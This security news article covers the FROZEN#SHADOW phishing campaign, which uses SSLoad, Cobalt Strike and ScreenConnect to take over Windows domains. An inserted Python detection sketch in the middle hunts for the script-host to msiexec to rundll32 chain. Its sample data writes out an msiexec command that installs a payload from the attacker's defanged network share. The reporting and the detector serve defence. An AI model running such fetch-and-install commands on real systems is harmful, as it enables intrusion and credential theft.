Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike

Apr 24, 2024 | Newsroom | Malware / Endpoint Security

Cybersecurity researchers have discovered an ongoing attack campaign that leverages phishing emails to deliver malware called SSLoad.

The campaign, codenamed FROZEN#SHADOW by Securonix, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.

“SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

“Once inside the system, SSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection.”

Attack chains involve the use of phishing messages that randomly target organizations in Asia, Europe, and the Americas, with emails containing links that lead to the retrieval of a JavaScript file that kicks off the infection flow.

Earlier this month, Palo Alto Networks uncovered at least two different methods by which SSLoad is distributed, one that entails the use of website contact forms to embed booby-trapped URLs and another involving macro-enabled Microsoft Word documents.

The latter is also notable for the fact that the malware acts as a conduit for delivering Cobalt Strike, while the former has been used to deliver a different malware called Latrodectus, a likely successor to IcedID.

The obfuscated JavaScript file (“out_czlrh.js”), when launched and run using wscript.exe, retrieves an MSI installer file (“slack.msi”) by connecting to a network share located at “wireoneinternet[.]info@80\share” and runs it using msiexec.exe.

The MSI installer, for its part, contacts an attacker-controlled domain to fetch and execute the SSLoad malware payload using rundll32.exe, after which it beacons to a command-and-control (C2) server along with information about the compromised system.
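The three-stage delivery described above (a script host running the .js, msiexec.exe installing from a WebDAV-style UNC share, and rundll32.exe started by the installer) is a process-lineage pattern a defender can hunt for in endpoint telemetry. The following is an added detection sketch, not code from the article or from Securonix; the event records are constructed for this example, the field names loosely follow Sysmon Event ID 1 (ProcessCreate) but are an assumption rather than a real log format, and the DLL name in the sample is a placeholder.

```python
"""Detection sketch for the wscript -> msiexec (WebDAV UNC) -> rundll32 chain.

Constructed sample telemetry; field names are an assumption of this example,
not an actual log schema."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # its command line


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# UNC path whose host carries an @<port> or @SSL suffix, i.e. a WebDAV share
# reached over HTTP(S) rather than SMB, as in \\host@80\share\file.msi.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:\d{1,5}|ssl)\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestor_names(event, by_pid, max_depth=4):
    """Image names of the parent, grandparent, ... up to max_depth hops."""
    names, cur = [], by_pid.get(event.ppid)
    while cur is not None and len(names) < max_depth:
        names.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return names


def detect(events):
    """Return (pid, rule_name) pairs for events that match the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        lineage = ancestor_names(e, by_pid)
        parent = lineage[0] if lineage else ""
        if name == "msiexec.exe":
            if WEBDAV_UNC.search(e.cmdline):
                findings.append((e.pid, "msiexec_install_from_webdav_unc"))
            if parent in SCRIPT_HOSTS:
                findings.append((e.pid, "msiexec_spawned_by_script_host"))
        if name == "rundll32.exe" and parent == "msiexec.exe":
            findings.append((e.pid, "rundll32_spawned_by_msiexec"))
            # Full chain: a script host somewhere above the installer.
            if any(a in SCRIPT_HOSTS for a in lineage[1:]):
                findings.append((e.pid, "script_host_msiexec_rundll32_chain"))
    return findings


# Constructed sample telemetry (not captured from a real host). The share path
# reuses the defanged host named in the article; placeholder.dll is invented.
SAMPLE_EVENTS = [
    ProcEvent(400, 300, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\out_czlrh.js"'),
    ProcEvent(410, 400, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i \\wireoneinternet[.]info@80\share\slack.msi /qn'),
    ProcEvent(420, 410, r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe C:\Users\alice\AppData\Local\Temp\placeholder.dll,Start'),
    # Benign: software deployment from a local path, no script-host parent.
    ProcEvent(500, 100, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i C:\Installers\slack.msi /qn'),
    # Benign: logon script run by a script host, nothing spawned from it.
    ProcEvent(600, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe C:\Scripts\logon.vbs'),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The rules are deliberately split: the WebDAV-UNC install and the script-host parent each fire on their own, so a single event still produces a lead even when parent/child linkage is incomplete, while the full-chain rule gives a higher-confidence alert when the whole lineage is visible. The benign local-path install and the plain logon script in the sample produce no findings.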

The initial reconnaissance phase paves the way for Cobalt Strike, a legitimate adversary simulation tool, which is then used to download and install ScreenConnect, allowing the threat actors to remotely commandeer the host.

“With full access to the system the threat actors began attempting to acquire credentials and gather other critical system details,” the researchers said. “At this stage they started scanning the victim host for credentials stored in files as well as other potentially sensitive documents.”

The attackers have also been observed pivoting to other systems in the network, including the domain controller, ultimately infiltrating the victim’s Windows domain by creating their own domain administrator account.

“With this level of access, they could get into any connected machine within the domain,” the researchers said. “In the end, this is the worst case scenario for any organization as this level of persistence achieved by the attackers would be incredibly time consuming and costly to remediate.”

The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems are being infected with an open-source remote access trojan called Pupy RAT.
